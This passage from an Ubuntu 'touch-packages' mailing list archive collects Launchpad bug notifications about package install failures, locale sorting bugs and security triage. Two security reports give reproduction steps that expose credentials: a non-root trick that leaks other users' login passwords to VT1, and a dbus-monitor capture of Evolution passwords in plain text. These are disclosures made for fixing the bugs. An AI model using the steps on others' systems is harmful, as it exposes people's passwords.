   update-notifier-common
   snapd
   ubuntu-core-launcher
   software-properties-common
   python3-httplib2
   python3-certifi
   python3-requests
   python3-requests-unixsocket
   python3-apport
   apport
   landscape-common
   ubuntu-server
   ssh-import-id
  Exception during pm.DoInstall():  E:Sub-process /usr/bin/dpkg returned an 
error code (1)

  ProblemType: Package
  DistroRelease: Ubuntu 18.04
  Package: ca-certificates 20180409
  ProcVersionSignature: Ubuntu 4.4.0-145.171-generic 4.4.176
  Uname: Linux 4.4.0-145-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  Date: Tue May 21 16:11:17 2019
  ErrorMessage: installed ca-certificates package post-installation script 
subprocess returned error exit status 23
  InstallationDate: Installed on 2017-01-30 (840 days ago)
  InstallationMedia: Ubuntu-Server 16.04.1 LTS "Xenial Xerus" - Release amd64 
(20160719)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.6, Python 3.6.7, python3-minimal, 
3.6.7-1~18.04
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.0.5ubuntu2.1
   apt  1.6.10
  SourcePackage: ca-certificates
  Title: package ca-certificates 20180409 failed to install/upgrade: installed 
ca-certificates package post-installation script subprocess returned error exit 
status 23
  UpgradeStatus: Upgraded to bionic on 2019-05-21 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+bug/1829885/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1829857] Re: package python-django 1.6.11-0ubuntu1.2 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1

[Seth Arnold]

The error message from the terminal log:

(Reading database ... 1522438 files and directories currently installed.)
Preparing to unpack .../python-django_1.6.11-0ubuntu1.3_all.deb ...
  File "/usr/bin/pyclean", line 63
except (IOError, OSError), e:
 ^
SyntaxError: invalid syntax
dpkg: warning: subprocess old pre-removal script returned error exit status 1
dpkg: trying script from the new package instead ...
  File "/usr/bin/pyclean", line 63
except (IOError, OSError), e:
 ^
SyntaxError: invalid syntax
dpkg: error processing archive 
/var/cache/apt/archives/python-django_1.6.11-0ubuntu1.3_all.deb (--unpack):
 subprocess new pre-removal script returned error exit status 1

** Also affects: python-defaults (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: python-django (Ubuntu)
 Assignee: Dhirendra (dhiru-research) => (unassigned)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python-defaults in Ubuntu.
https://bugs.launchpad.net/bugs/1829857

Title:
  package python-django 1.6.11-0ubuntu1.2 failed to install/upgrade:
  subprocess new pre-removal script returned error exit status 1

Status in python-defaults package in Ubuntu:
  New
Status in python-django package in Ubuntu:
  New

Bug description:
  The installation or removal of a software package failed.

  ProblemType: Package
  DistroRelease: Ubuntu 14.04
  Package: python-django 1.6.11-0ubuntu1.3
  ProcVersionSignature: Ubuntu 4.4.0-142.168~14.04.1-generic 4.4.167
  Uname: Linux 4.4.0-142-generic x86_64
  ApportVersion: 2.14.1-0ubuntu3.29
  Architecture: amd64
  Date: Tue May 21 17:26:39 2019
  DuplicateSignature: package:python-django:1.6.11-0ubuntu1.2:subprocess new 
pre-removal script returned error exit status 1
  ErrorMessage: subprocess new pre-removal script returned error exit status 1
  InstallationDate: Installed on 2016-08-11 (1012 days ago)
  InstallationMedia: Ubuntu 14.04.4 LTS "Trusty Tahr" - Release amd64 
(20160217.1)
  PackageArchitecture: all
  RelatedPackageVersions:
   dpkg 1.17.5ubuntu5.8
   apt  1.0.1ubuntu2.19
  SourcePackage: python-django
  Title: package python-django 1.6.11-0ubuntu1.2 failed to install/upgrade: 
subprocess new pre-removal script returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python-defaults/+bug/1829857/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1829650] Re: OpenGl

[Seth Arnold]

Thanks for taking the time to report this bug and helping to make Ubuntu
better. We appreciate the difficulties you are facing, but this appears
to be a "regular" (non-security) bug.  I have unmarked it as a security
issue since this bug does not show evidence of allowing attackers to
cross privilege boundaries nor directly cause loss of data/privacy.
Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1829650

Title:
  OpenGl

Status in xorg package in Ubuntu:
  New

Bug description:
  So I was messing around in the Libre Office settings and enabled Open
  GL (Hoping for GL acceleration) . Once I restarted Libre office, It
  would load, but a window would appear briefly and close.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: xorg 1:7.7+19ubuntu7.1
  ProcVersionSignature: Ubuntu 4.15.0-51.55-generic 4.15.18
  Uname: Linux 4.15.0-51-generic x86_64
  .tmp.unity_support_test.0:
   
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  CompizPlugins: No value set for 
`/apps/compiz-1/general/screen0/options/active_plugins'
  CompositorRunning: None
  Date: Sun May 19 12:40:25 2019
  DistUpgraded: Fresh install
  DistroCodename: bionic
  DistroVariant: ubuntu
  GraphicsCard:
   Intel Corporation 3rd Gen Core processor Graphics Controller [8086:0166] 
(rev 09) (prog-if 00 [VGA controller])
 Subsystem: Lenovo 3rd Gen Core processor Graphics Controller [17aa:21f3]
  MachineType: LENOVO 2349IP5
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-51-generic 
root=UUID=66ca1202-c6da-48c1-be0e-f4b431fb8924 ro quiet splash vt.handoff=1
  Renderer: Software
  SourcePackage: xorg
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 01/09/2013
  dmi.bios.vendor: LENOVO
  dmi.bios.version: G1ET91WW (2.51 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 2349IP5
  dmi.board.vendor: LENOVO
  dmi.board.version: Win8 Pro DPK TPG
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvrG1ET91WW(2.51):bd01/09/2013:svnLENOVO:pn2349IP5:pvrThinkPadT430:rvnLENOVO:rn2349IP5:rvrWin8ProDPKTPG:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.family: ThinkPad T430
  dmi.product.name: 2349IP5
  dmi.product.version: ThinkPad T430
  dmi.sys.vendor: LENOVO
  version.compiz: compiz 1:0.9.13.1+18.04.20180302-0ubuntu1
  version.libdrm2: libdrm2 2.4.97-1ubuntu1~18.04.1
  version.libgl1-mesa-dri: libgl1-mesa-dri 19.0.2-1ubuntu1~18.04.1
  version.libgl1-mesa-glx: libgl1-mesa-glx 19.0.2-1ubuntu1~18.04.1
  version.xserver-xorg-core: xserver-xorg-core 2:1.19.6-1ubuntu4.2
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.5-1ubuntu1
  version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:18.0.1-1
  version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20171229-1
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.15-2
  xserver.bootTime: Sun May 19 02:45:50 2019
  xserver.configfile: default
  xserver.errors:
   open /dev/dri/card0: No such file or directory
   open /dev/dri/card0: No such file or directory
   Screen 0 deleted because of no matching config section.
   AIGLX: reverting to software rendering
  xserver.logfile: /var/log/Xorg.0.log
  xserver.outputs:
   
  xserver.version: 2:1.19.6-1ubuntu4.2

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1829650/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1829588] [NEW] make it easy to add proposed; help text outdated

[Seth Arnold]

Public bug reported:

I want to do some SRU testing but I have to look up how to add the
-proposed lines to apt sources every time I want to do this task. The
wiki page for it is pretty verbose and includes text like: "Replace
"xenial" with "trusty", "vivid", "utopic", "precise", or "lucid"
depending on which release you are on. "

Adding -proposed should be as easy as running:

sudo add-apt-repository proposed

But this doesn't work:
$ sudo add-apt-repository proposed
Error: 'proposed' invalid

The help text includes a bunch of examples of things that users almost
never need to do any more:

$ add-apt-repository -h
[...]
  Examples:
apt-add-repository 'deb http://myserver/path/to/repo stable myrepo'
apt-add-repository 'http://myserver/path/to/repo myrepo'
apt-add-repository 'https://packages.medibuntu.org free non-free'
apt-add-repository http://extras.ubuntu.com/ubuntu
apt-add-repository ppa:user/repository
apt-add-repository ppa:user/distro/repository
apt-add-repository multiverse


https://packages.medibuntu.org is now owned by a commerce site, or squatter, or 
something similar. It also fails certificate validation. This should be removed.

http://extras.ubuntu.com/ubuntu/dists/ has precise through utopic. Maybe
we shouldn't remove this yet, but someday we may want to revisit this
one.

It'd be great to have examples of adding proposed, universe, security,
updates, etc.

Maybe it'd be nice to put a reference to whatever tool would also enable
ESM.

Thanks

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: software-properties-common 0.96.24.32.7
ProcVersionSignature: Ubuntu 4.15.0-50.54-generic 4.15.18
Uname: Linux 4.15.0-50-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.9-0ubuntu7.6
Architecture: amd64
Date: Fri May 17 18:32:49 2019
InstallationDate: Installed on 2012-10-18 (2402 days ago)
InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 
(20120823.1)
PackageArchitecture: all
ProcEnviron:
 TERM=rxvt-unicode-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: software-properties
UpgradeStatus: Upgraded to bionic on 2018-05-02 (381 days ago)

** Affects: software-properties (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug bionic third-party-packages

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1829588

Title:
  make it easy to add proposed; help text outdated

Status in software-properties package in Ubuntu:
  New

Bug description:
  I want to do some SRU testing but I have to look up how to add the
  -proposed lines to apt sources every time I want to do this task. The
  wiki page for it is pretty verbose and includes text like: "Replace
  "xenial" with "trusty", "vivid", "utopic", "precise", or "lucid"
  depending on which release you are on. "

  Adding -proposed should be as easy as running:

  sudo add-apt-repository proposed

  But this doesn't work:
  $ sudo add-apt-repository proposed
  Error: 'proposed' invalid

  The help text includes a bunch of examples of things that users almost
  never need to do any more:

  $ add-apt-repository -h
  [...]
Examples:
  apt-add-repository 'deb http://myserver/path/to/repo stable myrepo'
  apt-add-repository 'http://myserver/path/to/repo myrepo'
  apt-add-repository 'https://packages.medibuntu.org free non-free'
  apt-add-repository http://extras.ubuntu.com/ubuntu
  apt-add-repository ppa:user/repository
  apt-add-repository ppa:user/distro/repository
  apt-add-repository multiverse

  
  https://packages.medibuntu.org is now owned by a commerce site, or squatter, 
or something similar. It also fails certificate validation. This should be 
removed.

  http://extras.ubuntu.com/ubuntu/dists/ has precise through utopic.
  Maybe we shouldn't remove this yet, but someday we may want to revisit
  this one.

  It'd be great to have examples of adding proposed, universe, security,
  updates, etc.

  Maybe it'd be nice to put a reference to whatever tool would also
  enable ESM.

  Thanks

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: software-properties-common 0.96.24.32.7
  ProcVersionSignature: Ubuntu 4.15.0-50.54-generic 4.15.18
  Uname: Linux 4.15.0-50-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.9-0ubuntu7.6
  Architecture: amd64
  Date: Fri May 17 18:32:49 2019
  InstallationDate: Installed on 2012-10-18 (2402 days ago)
  InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 
(20120823.1)
  PackageArchitecture: all
  ProcEnviron:
   TERM=rxvt-unicode-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: software-properties
  UpgradeStatus: Upgraded to bionic on 

[Touch-packages] [Bug 1803993] Re: Password appears on the VT1 screen

[Seth Arnold]

Use CVE-2018-20839.

Thanks

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-20839

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1803993

Title:
  Password appears on the VT1 screen

Status in gdm3 package in Ubuntu:
  Invalid
Status in plymouth package in Ubuntu:
  Invalid
Status in systemd package in Ubuntu:
  In Progress

Bug description:
  [Impact]

   * The keyboard on the graphical login screen started on VT1 may stop
  working and or keypresses including passwords are leaked to the
  terminal console running 'behind' the graphical login screen or
  environment.

  [Test Case]

   * Reboot after installing the fixed systemd package.
   * Install sysdig
   * Start sysdig on a remote connection or on a terminal console:
$ sudo sysdig evt.type=ioctl | grep  request=4B4
   * While sysdig is running log in and out 3 times in GDM and press a few keys 
in the graphical session to see if keyboard still works
   * Log in and out on an other terminal console, too, running a few commands 
while being logged in to ensure that keyboard is working.
   * Observe that on terminal consoles the monitored keyboard setter ioctl is 
called with argument=3, but where the graphical screen is active only 
argument=4 is used, unlike with the buggy version observed in 
https://bugs.launchpad.net/ubuntu/+source/gdm3/+bug/1803993/comments/14

  [Regression Potential]

   * The fix checks the current keyboard mode of the VT and allows only
  safe mode switches. The potential regression could be not allowing a
  valid mode switch keeping a keyboard in a non-operational mode.
  Testing covers that by typing the keyboard.

  
  (continued from bug 1767918)

  This was found when an administrative error made /home directory
  inaccessible.  Any users that tried to login after that, were not able
  to (which is expected) but their password appears on the VT1 screen.
  Under normal circumstances, VT1 is not visible. But once the system
  was sent into this compromised mode, one can press ctrl+alt+F1 and
  then ctrl+alt+F2 and get a momentary glance at VT1. One can keep
  toggling between these key combinations in order to make out the
  password(s) on VT1.

  As a further test, I wanted to see if a non-super user could cause
  this condition, and it is in fact possible. As a regular user, I made
  their own home directory not writable and then removed ~/.config and
  logged out. Then logged in as that user again, and although that user
  can't login the system does go into that mode where passwords appear
  on VT1 and are viewable with the key combinations mentioned herein.
  Further, any other users that login will see no problem, but when they
  logon their passwords also appear on VT1 and are viewable.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: gdm3 3.28.3-0ubuntu18.04.3
  Uname: Linux 4.19.2-041902-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Mon Nov 19 08:32:59 2018
  InstallationDate: Installed on 2018-08-25 (85 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: gdm3
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gdm3/+bug/1803993/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1828190] Re: latest wget debian for ubuntu 16.04

[Seth Arnold]

Vibhu, please see https://usn.ubuntu.com/3943-1/ for information on the
most recent wget security update we performed.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to wget in Ubuntu.
https://bugs.launchpad.net/bugs/1828190

Title:
  latest wget debian for ubuntu 16.04

Status in wget package in Ubuntu:
  Invalid

Bug description:
  We are looking for the latest debians for wget in ubuntu 16.04. Can
  someone help? This is to address some security vulnerabilities

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/wget/+bug/1828190/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1828124] Re: org.gnome.evolution.dataserver.Source completely unveils account credentials in plain text while using dbus-monitor

[Seth Arnold]

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to evolution-data-server in
Ubuntu.
https://bugs.launchpad.net/bugs/1828124

Title:
  org.gnome.evolution.dataserver.Source completely unveils account
  credentials in plain text while using dbus-monitor

Status in evolution-data-server:
  Unknown
Status in evolution-data-server package in Ubuntu:
  Incomplete

Bug description:
  Steps to reproduce:
  1. Install Ubuntu 16.04 LTS
  2. Install Evolution
  3. Set-up Google account with default settings (this will end with e-mail and 
calendar)
  4. Reboot
  5. Open evolution Calendar and/or indicator-datetime
  6. Launch `dbus-monitor`

  Expected results:
  * Evolution does not show account credentials in plain text in `dbus-monitor` 
output

  Actual results:
  * Evolution shows account credentials in plain text in `dbus-monitor` output:

  
  method call time=1557268474.383095 sender=:1.74 -> destination=:1.40 
serial=939 path=/org/gnome/evolution/dataserver/SourceManager/Source_17; 
interface=org.gnome.evolution.dataserver.Source; member=InvokeAuthenticate
 array [
string "password:myrealpassword"
string "ssl-trust:"
 ]
  method return time=1557268474.383686 sender=:1.40 -> destination=:1.74 
serial=366 reply_serial=939
  signal time=1557268474.389206 sender=:1.40 -> destination=(null destination) 
serial=367 path=/org/gnome/evolution/dataserver/SourceManager/Source_17; 
interface=org.gnome.evolution.dataserver.Source; member=Authenticate
 array [
string "password:myrealpassword"
string "ssl-trust:"
 ]

  signal time=1557268520.956861 sender=:1.40 -> destination=(null destination) 
serial=408 path=/org/gnome/evolution/dataserver/SourceManager/Source_19; 
interface=org.gnome.evolution.dataserver.Source; member=Authenticate
 array [
string "password:myrealpassword"
string "ssl-trust:"
string "username:real@email"
 ]
  signal time=1557268520.960443 sender=:1.40 -> destination=(null destination) 
serial=409 path=/org/gnome/evolution/dataserver/SourceManager/Source_18; 
interface=org.gnome.evolution.dataserver.Source; member=Authenticate
 array [
string "password:myrealpassword"
string "ssl-trust:"
string "username:real@email"
 ]
  signal time=1557268520.964374 sender=:1.40 -> destination=(null destination) 
serial=410 path=/org/gnome/evolution/dataserver/SourceManager/Source_20; 
interface=org.gnome.evolution.dataserver.Source; member=Authenticate
 array [
string "password:myrealpassword"
string "ssl-trust:"
string "username:real@email"
 ]

  -
  This is huge security flaw. The malicious script can parse `dbus-monitor` 
output...
  Not sure about more recent Ubuntu and Evolution versions.

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: evolution-data-server-common 3.18.5-1ubuntu1.1
  ProcVersionSignature: Ubuntu 4.4.0-143.169-generic 4.4.170
  Uname: Linux 4.4.0-143-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.18
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Wed May  8 01:40:27 2019
  InstallationDate: Installed on 2018-01-04 (488 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  PackageArchitecture: all
  SourcePackage: evolution-data-server
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/evolution-data-server/+bug/1828124/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1822590] Re: Found storing user fingerprints without encryption

[Seth Arnold]

Incidentally, there's nothing for the AppArmor project to do here -- any
confined program will include or not include the fingerprint data as
specified in the profile.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1822590

Title:
  Found storing user fingerprints without encryption

Status in fprintd:
  New
Status in apparmor package in Ubuntu:
  Won't Fix
Status in fprintd package in Ubuntu:
  Triaged
Status in Debian:
  Unknown

Bug description:
  Dear all,

  I would like to report a new issue as follows.
  ‘fprintd’ saves a fingerprint data, ISO/IEC 19794-2 formatted, to a file on 
the host without any encryption.
  Though fprintd generates fingerprint image with root permission for 
protecting the file from attackers, it is not of itself sufficient.
  It is well known threat model that a formatted fingerprint data can be 
restored to original image about a decade ago.
  [1-4] are presented to create sophisticated and natural-looking fingerprints 
only from the numerical template data format as defined in ISO/IEC 19794-2.
  They also successfully evaluated these approaches against a number of 
undisclosed state-of-the-art algorithms and the NIST Fingerprint Image Software.

  We need improvements of those issues.

  [1] R. Cappelli et al., “Fingerprint Image Reconstruction from Standard 
Templates”, IEEE Trans. on Pattern Analysis and Machine Intelligence, vol.29, 
no.9, pp.1489-1503, 2007.
  [2] A. Ross et al., “From template to image: Reconstructing fingerprints from 
minutiae points”, IEEE Trans on Pattern Analysis and Machine Intelligence, 
vol.29, no.4, pp.544-560, 2007.
  [3] R. Cappelli et al., “Can Fingerprints be reconstructed from ISO 
Templates?”, IEEE ICARCV 2006.
  [4] J. Feng et al., “Fingerprint Reconstruction: From Minutiae to Phase”, 
IEEE Trans on Pattern Analysis and Machine Intelligence, vol.33, no.2, 
pp.209-223, 2011.

  Sincerely,
  Seong-Joong Kim

To manage notifications about this bug go to:
https://bugs.launchpad.net/fprintd/+bug/1822590/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1822590] Re: Found storing user fingerprints without encryption

[Seth Arnold]

I'll include as a comment my reply to an email from the reporter:

Hello,

Note that the Ubuntu security team considers fingerprints to be akin to
usernames, rather than passwords. They cannot be changed, they are left on
thousands of objects daily, and repeated demonstrations of sensors being
'fooled' by artificial constructions from photographs etc basically mean
fingerprints are not worth much as authentication tokens.

In the Main Inclusion Request review for fprintd and libfprint, we
included:

It's important to note that security team considers fingerprints to
be akin to usernames and not passwords. Any potential issues with
this tool will be treated with this threat model in mind.

-- https://bugs.launchpad.net/ubuntu/+source/fprintd/+bug/1745455

Under this threat model, disclosure of a fingerprint is not a
vulnerability.

Perhaps the fprintd or libfprintd authors will see things differently,
but I suspect most security practitioners have decided that fingerprints
are identifiers, not authenticators.

Thanks



** Changed in: apparmor (Ubuntu)
   Status: New => Won't Fix

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1822590

Title:
  Found storing user fingerprints without encryption

Status in fprintd:
  New
Status in apparmor package in Ubuntu:
  Won't Fix
Status in fprintd package in Ubuntu:
  Triaged
Status in Debian:
  Unknown

Bug description:
  Dear all,

  I would like to report a new issue as follows.
  ‘fprintd’ saves a fingerprint data, ISO/IEC 19794-2 formatted, to a file on 
the host without any encryption.
  Though fprintd generates fingerprint image with root permission for 
protecting the file from attackers, it is not of itself sufficient.
  It is well known threat model that a formatted fingerprint data can be 
restored to original image about a decade ago.
  [1-4] are presented to create sophisticated and natural-looking fingerprints 
only from the numerical template data format as defined in ISO/IEC 19794-2.
  They also successfully evaluated these approaches against a number of 
undisclosed state-of-the-art algorithms and the NIST Fingerprint Image Software.

  We need improvements of those issues.

  [1] R. Cappelli et al., “Fingerprint Image Reconstruction from Standard 
Templates”, IEEE Trans. on Pattern Analysis and Machine Intelligence, vol.29, 
no.9, pp.1489-1503, 2007.
  [2] A. Ross et al., “From template to image: Reconstructing fingerprints from 
minutiae points”, IEEE Trans on Pattern Analysis and Machine Intelligence, 
vol.29, no.4, pp.544-560, 2007.
  [3] R. Cappelli et al., “Can Fingerprints be reconstructed from ISO 
Templates?”, IEEE ICARCV 2006.
  [4] J. Feng et al., “Fingerprint Reconstruction: From Minutiae to Phase”, 
IEEE Trans on Pattern Analysis and Machine Intelligence, vol.33, no.2, 
pp.209-223, 2011.

  Sincerely,
  Seong-Joong Kim

To manage notifications about this bug go to:
https://bugs.launchpad.net/fprintd/+bug/1822590/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1774857] Re: sort doesn't sort and uniq loses data for many non-Latin scripts on UTF-8 locales

[Seth Arnold]

Probably related:
https://bugzilla.redhat.com/show_bug.cgi?id=1336308

and probably related:
https://sourceware.org/git/?p=glibc.git;a=commit;h=b11643c21c5c9d67a69c8ae952e5231ce002e7f1

Thanks

** Bug watch added: Red Hat Bugzilla #1336308
   https://bugzilla.redhat.com/show_bug.cgi?id=1336308

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to coreutils in Ubuntu.
https://bugs.launchpad.net/bugs/1774857

Title:
  sort doesn't sort and uniq loses data for many non-Latin scripts on
  UTF-8 locales

Status in coreutils package in Ubuntu:
  New
Status in glibc package in Ubuntu:
  New

Bug description:
  I’ve found out that sort doesn’t sort strings for many non-Latin
  scripts at all if the locale you’re using is one of en_US.UTF-8,
  fr_FR.UTF-8 or fi_FI.UTF-8 (probably others, too, but these are the
  ones I have tested). For locales ”C” and ko_KR.UTF-8, things work as
  expected. Here’s a test case:

  Open xterm, launch sort and input some lines of Syriac, Ethiopic,
  Korean, Japanese (Hiragana or Katakana, not Han) or Thai text
  repeating one of the lines twice. Here’s an example in Syriac:

  ܡܠܬܐ
  ܒܝܬܐ
  ܒܪܢܫܐ
  ܡܠܬܐ

  Sort produces the following:

  ܡܠܬܐ
  ܒܝܬܐ
  ܡܠܬܐ
  ܒܪܢܫܐ

  Here strings are ordered only according to their length but not
  characters. Even the two instances of the word ܡܠܬܐ are found on non-
  adjacent lines (1 and 3). The expected sort order based on Unicode
  points would be:

  ܒܝܬܐ
  ܒܪܢܫܐ
  ܡܠܬܐ
  ܡܠܬܐ

  If you further pass sort’s output to uniq, it produces the following:

  ܡܠܬܐ
  ܒܪܢܫܐ

  Here the word on line 2 ܒܝܬܐ is completely lost since, like sort, uniq
  seems to consider all Syriac strings of equal length as the same.

  Although this issue affects locale, I think it is not a locale issue
  per se, since perl seems to handle similar cases expectedly. For
  instance, the following command produces the expected result:

  perl -CDS -e 'use locale; use utf8; @str = ("ܡܠܬܐ", "ܒܝܬܐ", "ܒܪܢܫܐ",
  "ܡܠܬܐ"); foreach $i (sort @str) { print "$i\n"; }'

  Curiously enough, codepoints in Plane 1 seem to count as two
  codepoints of the basic plane, so that if you sort | uniq the
  following (six codepoints of Syriac and three codepoints of
  Phoenician):

  ܥܠܝܟܘܢ
  ँउक

  you get ”ܥܠܝܟܘܢ" as the result whereas ”ँउक” is lost. This is of
  course due to the UTF-8 representation of Plane 1 characters as two
  surrogate characters on the basic plane.

  Also curiously, LTR scripts seem to conflate with each other and RTL
  scripts among themselves but not across the directionality line, so
  that if you sort | uniq the following (three codepoints each in
  Ethiopic, Hangul, Syriac, Hiragana and Thai):

  ዘመን
  스물셋
  ܐܢܐ
  わたし
  ฟ้า

  you are left with:

  ܐܢܐ
  ዘመን

  That’s one line of Syriac and one line of Ethiopic; everything else
  was lost. This issue does not seem to affect most Indic scripts
  (Devanagari, Bengali, Telugu etc.) or Arabic. For CJK, things work as
  expected for the main Unicode block (4E00..9FFF) but not for Extension
  A (3400..4DBF, such as 㗖 or 㡘 or 㰋). For Greek, monotonic accents work
  fine but all polytonic letters are conflated (αὐλὸς and αὐλῆς conflate
  to αὐλῆς). For Hebrew, letters and vowel marks work fine but
  cantillation marks are conflated.

  
  Description:  Ubuntu 18.04 LTS
  Release:  18.04

  coreutils:
Installed: 8.28-1ubuntu1
Candidate: 8.28-1ubuntu1
Version table:
   *** 8.28-1ubuntu1 500
  500 http://mr.archive.ubuntu.com/ubuntu bionic/main amd64 Packages
  100 /var/lib/dpkg/status

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: coreutils 8.28-1ubuntu1
  ProcVersionSignature: Ubuntu 4.15.0-22.24-generic 4.15.17
  Uname: Linux 4.15.0-22-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.1
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Sun Jun  3 10:13:06 2018
  InstallationDate: Installed on 2017-02-13 (474 days ago)
  InstallationMedia: Ubuntu 16.10 "Yakkety Yak" - Release amd64 (20161012.2)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=fi_FI.UTF-8
   SHELL=/bin/bash
  SourcePackage: coreutils
  UpgradeStatus: Upgraded to bionic on 2018-05-31 (2 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/coreutils/+bug/1774857/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1826429] Re: package apparmor 2.13.2-9ubuntu6 failed to install/upgrade: installed apparmor package post-installation script subprocess returned error exit status 1

[Seth Arnold]

Hello, this is pretty confusing: coreutils in both 18.10 and 19.04 have
mv -Z support, so regardless of which coreutils package was unpacked at
the time, the command should have succeeded.

Could you do some investigation?

which mv
mv --help | grep Z
ls -l `which mv`
